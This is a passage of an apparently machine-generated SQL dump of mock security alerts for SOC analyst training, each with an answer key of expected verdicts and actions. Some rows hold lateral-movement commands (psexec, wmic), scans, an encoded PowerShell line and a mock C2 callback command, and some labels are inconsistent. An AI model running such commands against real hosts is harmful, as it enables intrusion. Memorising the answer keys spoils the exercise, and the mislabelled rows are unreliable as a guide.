(1915, 'Authorized Administrative Activity Detected as Lateral Movement', 'medium', 'Darktrace', 'Detected administrative access from IT personnel flagged as potential lateral movement. The access was legitimate.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.75.15\",\"dst_ip\":\"192.168.75.25\",\"username\":\"it_admin\",\"hostname\":\"admin-pc\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.75.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT staff for legitimate administrative tasks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was conducted by authorized IT personnel and is not suspicious.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1916, 'False Positive: Misconfigured Legacy Application', 'low', 'Zeek', 'Network traffic from a misconfigured legacy application detected as potential C2 beaconing. The application is not malicious.', 'C2', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.100.50\",\"dst_ip\":\"192.168.100.200\",\"username\":\"legacyapp\",\"hostname\":\"legacy-server\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a known legacy application server.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2\",\"analysis_notes\":\"The traffic is generated by a non-malicious legacy application due to configuration errors.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1917, 'C2 Beaconing Detected from External IP', 'high', 'Wireshark', 'Detected C2 beaconing from an external IP address. OSINT lookup confirms the IP is associated with known malicious activities.', 'C2', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"N/A\",\"hostname\":\"workstation01\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks and C2 activities.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"c2\",\"analysis_notes\":\"OSINT confirms malicious activities associated with the external IP address, indicating a true positive.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1918, 'Suspicious PSExec Lateral Movement Detected', 'medium', 'Corelight', 'A PSExec command was executed from an internal IP to another internal host, indicating potential lateral movement.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:22:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.2.15\",\"dst_ip\":\"10.0.2.20\",\"username\":\"admin_user\",\"hostname\":\"workstation-01\",\"command_line\":\"psexec \\\\\\\\10.0.2.20 -u admin_user cmd.exe\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP, part of authorized network activities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\10.0.2.20 -u admin_user cmd.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Routine administrative task\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This activity is part of routine IT maintenance and administrative tasks.\"}', 'Beginner', 'NDR', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(1919, 'Routine IT Vulnerability Scanning Detected', 'low', 'Zeek', 'Network traffic analysis detected scanning activities from an internal network scanner.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:55:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.100\",\"username\":\"-\",\"hostname\":\"scanner-01\",\"request_body\":\"-\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for authorized scanning activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target of authorized internal scan\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected network scan is part of routine security assessments conducted by the IT department.\"}', 'Beginner', 'NDR', 3, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1920, 'False Positive Lateral Movement via WMI Detected', 'medium', 'Suricata', 'WMI command detected between two internal hosts, potentially indicating lateral movement, but confirmed as a scheduled task.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:40:25Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.5.10\",\"dst_ip\":\"10.0.5.15\",\"username\":\"scheduler\",\"hostname\":\"server-01\",\"command_line\":\"wmic /node:10.0.5.15 process call create \'cmd /c echo scheduled task\'\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Initiating internal IP, part of routine scheduled tasks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:10.0.5.15 process call create \'cmd /c echo scheduled task\'\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Scheduled task execution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This action is part of a routine scheduled task and does not represent malicious activity.\"}', 'Beginner', 'NDR', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1921, 'Data Exfiltration Alert from Legacy System', 'high', 'Darktrace', 'Unusual data transfer detected from a legacy system to an external IP, appearing suspicious but traced to authorized backup process.', 'Data Exfil', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:10:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"172.16.0.5\",\"dst_ip\":\"198.51.100.10\",\"username\":\"backup_user\",\"hostname\":\"legacy-system-01\",\"request_body\":\"-\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in legitimate backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized backup server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected data transfer is part of a scheduled backup process to an external server.\"}', 'Beginner', 'NDR', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1922, 'C2 Beaconing to Malicious IP Detected', 'critical', 'Wireshark', 'A network connection from an internal host to a known malicious IP indicative of C2 beaconing.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"203.0.113.45\",\"username\":\"unknown\",\"hostname\":\"infected-host-01\",\"request_body\":\"-\"}', '2026-03-16 03:09:14', '2026-03-16 03:09:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP showing signs of compromise\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 and malware activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection to a known C2 IP confirms the presence of malware on the internal host.\"}', 'Beginner', 'NDR', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1923, 'Routine Vulnerability Scan Detected', 'low', 'Zeek', 'A network scan from an internal IP was detected, resembling a vulnerability assessment.', 'Lateral Movement', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"IT-Scanner-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal IT department responsible for routine scans.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The scan was conducted by an internal tool for routine vulnerability assessments.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1924, 'Authorized Administrative Backup Activity', 'low', 'Suricata', 'Detected high-volume data transfer from internal server to backup server, typical of scheduled backup tasks.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.100\",\"username\":\"backup_admin\",\"hostname\":\"Backup-Server-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Regularly scheduled backup operation to authorized backup server.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected activity aligns with the scheduled backup tasks performed by IT.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1925, 'Misconfigured Legacy Application Traffic', 'medium', 'Corelight', 'Anomalous traffic patterns observed from a legacy application server due to a configuration error.', 'Lateral Movement', 'T1021', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.12\",\"dst_ip\":\"192.168.3.25\",\"username\":\"legacy_user\",\"hostname\":\"Legacy-App-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Legacy system misconfiguration leading to unusual traffic patterns.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The traffic pattern is due to a known issue with a legacy application configuration error.\"}', 'Intermediate', 'NDR', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1926, 'Routine Health Check by Network Monitoring Tool', 'low', 'Darktrace', 'Network monitoring tool detected performing routine health checks across multiple internal subnets.', 'Lateral Movement', 'T1049', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"192.168.4.11\",\"username\":\"netmon\",\"hostname\":\"Monitoring-Tool-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Recognized network monitoring tool performing regular health checks.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The network activity is consistent with normal operations of a network health monitoring tool.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1927, 'Confirmed Malware C2 Beaconing Activity', 'critical', 'Wireshark', 'Detected traffic from an internal host to an external C2 server, indicating potential malware beaconing.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.50\",\"dst_ip\":\"203.0.113.200\",\"username\":\"compromised_user\",\"hostname\":\"Infected-Host-01\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.5.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"Internal host exhibiting suspicious behavior.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The traffic pattern and destination IP confirm malicious C2 beaconing from the internal host.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1928, 'Routine IT Vulnerability Scan', 'low', 'Zeek', 'Detected network traffic resembling a potential reconnaissance scan. Internal vulnerability scanning tool was run by IT.', 'Reconnaissance', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.200\",\"username\":\"admin_scan\",\"hostname\":\"scan-tool.local\",\"command_line\":\"nmap -sS 192.168.1.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used by IT for scanning purposes\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.0/24\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Common command for network scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"reconnaissance\",\"analysis_notes\":\"This alert was generated by an internal vulnerability scan conducted by the IT department.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1929, 'Authorized Administrative Backup Traffic', 'low', 'Corelight', 'Network activity flagged as potential data exfiltration. Upon investigation, it was identified as routine backup operations.', 'Data Exfiltration', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"192.168.2.11\",\"username\":\"backup_admin\",\"hostname\":\"backup-server.local\",\"command_line\":\"rsync -avz /data/ 192.168.2.11:/backup/\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of backup server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data/ 192.168.2.11:/backup/\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Known command for data backup using rsync\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert pertains to authorized backup operations and is not indicative of data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1930, 'Misconfigured Legacy Application Communication', 'medium', 'Suricata', 'Unusual network traffic was flagged as potential C2 beaconing. Analysis revealed it to be a misconfigured legacy application.', 'C2 Beaconing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"203.0.113.5\",\"username\":\"legacy_app\",\"hostname\":\"legacy-server.local\",\"command_line\":\"legacy_app --connect 203.0.113.5\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with legacy application\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 5 times for non-malicious traffic\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"legacy_app --connect 203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used by legacy application for communication\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"c2_beaconing\",\"analysis_notes\":\"The legacy application was misconfigured, resulting in network traffic that mimicked C2 beaconing.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1931, 'Benign System Health Check Traffic', 'low', 'Darktrace', 'Network connection detected that appeared as lateral movement. Identified as benign system health checks.', 'Lateral Movement', 'T1087', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.20\",\"dst_ip\":\"192.168.5.30\",\"username\":\"health_check\",\"hostname\":\"monitor-server.local\",\"command_line\":\"ping -c 4 192.168.5.30\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP performing health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ping -c 4 192.168.5.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Standard ping command for system health checks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The activity was a part of routine system health checks and did not constitute lateral movement.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1932, 'Suspicious Command Execution Detected on Endpoint', 'high', 'Wireshark', 'Potential malicious command execution detected involving an unauthorized script execution on an endpoint.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.168.50.10\",\"username\":\"compromised_user\",\"hostname\":\"compromised-machine.local\",\"command_line\":\"powershell.exe -EncodedCommand aABpACAAJwB3AG8AcgBsAGQAJwA=\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aABpACAAJwB3AG8AcgBsAGQAJwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of unauthorized execution\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"This alert represents a true positive as the PowerShell command was executed without authorization, indicating potential compromise.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(1933, 'Routine IT Vulnerability Scanning Detected', 'low', 'Wireshark', 'A network scan was detected from an internal IP address, which appears to be part of authorized IT routine maintenance.', 'Lateral Movement', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"itadmin\",\"hostname\":\"IT-SERVER01\",\"command_line\":\"nmap -sS 192.168.1.0/24\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal network used by IT department\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine network scanning command by IT\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The alert is a false positive as it matches the profile of authorized IT scanning activity.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1934, 'Authorized Administrative Backup Activity', 'medium', 'Corelight', 'A data transfer from a critical server was detected. The activity matches scheduled backup operations.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"10.0.0.5\",\"username\":\"backupadmin\",\"hostname\":\"BACKUP-SERVER\",\"command_line\":\"rsync -avz /data 10.0.0.5:/backup\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of an internal server used for backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rsync -avz /data 10.0.0.5:/backup\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for authorized data backup\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"This alert is a false positive because the data transfer aligns with scheduled backup activities.\"}', 'Intermediate', 'NDR', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(1935, 'Benign System Health Check Detected', 'low', 'Zeek', 'An internal IP address executed health check scripts on several network devices. This activity is part of regular system maintenance.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.25\",\"dst_ip\":\"192.168.3.30\",\"username\":\"syshealth\",\"hostname\":\"HEALTH-CHECKER\",\"command_line\":\"healthcheck --device 192.168.3.30 --report\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for system health checks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"healthcheck --device 192.168.3.30 --report\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for authorized health check\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"This alert is a false positive as it corresponds to routine health checks performed by the IT department.\"}', 'Intermediate', 'NDR', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(1936, 'Misconfigured Legacy Application Traffic', 'medium', 'Suricata', 'Unusual network activity from a legacy application server was detected. The traffic pattern aligns with known misconfigurations causing false alarms.', 'Data Exfil', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.40\",\"dst_ip\":\"198.51.100.10\",\"username\":\"legacyapp\",\"hostname\":\"LEGACY-SERVER\",\"command_line\":\"\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address associated with legacy application server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP with no malicious activity reported\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert is a false positive due to known misconfigurations in legacy applications causing benign network traffic.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(1937, 'Suspicious C2 Beaconing Detected', 'high', 'Darktrace', 'A device on the internal network is communicating with a known Command and Control server. The communication pattern matches known malware behavior.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.50\",\"dst_ip\":\"203.0.113.45\",\"username\":\"infecteduser\",\"hostname\":\"INFECTED-PC\",\"command_line\":\"malicious.exe --connect 203.0.113.45\"}', '2026-03-16 03:10:34', '2026-03-16 03:10:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address showing signs of infection\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"malicious.exe --connect 203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Executable associated with multiple malware families\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This alert is a true positive, as the communication pattern and IP address match known malicious activity linked to C2 servers.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, 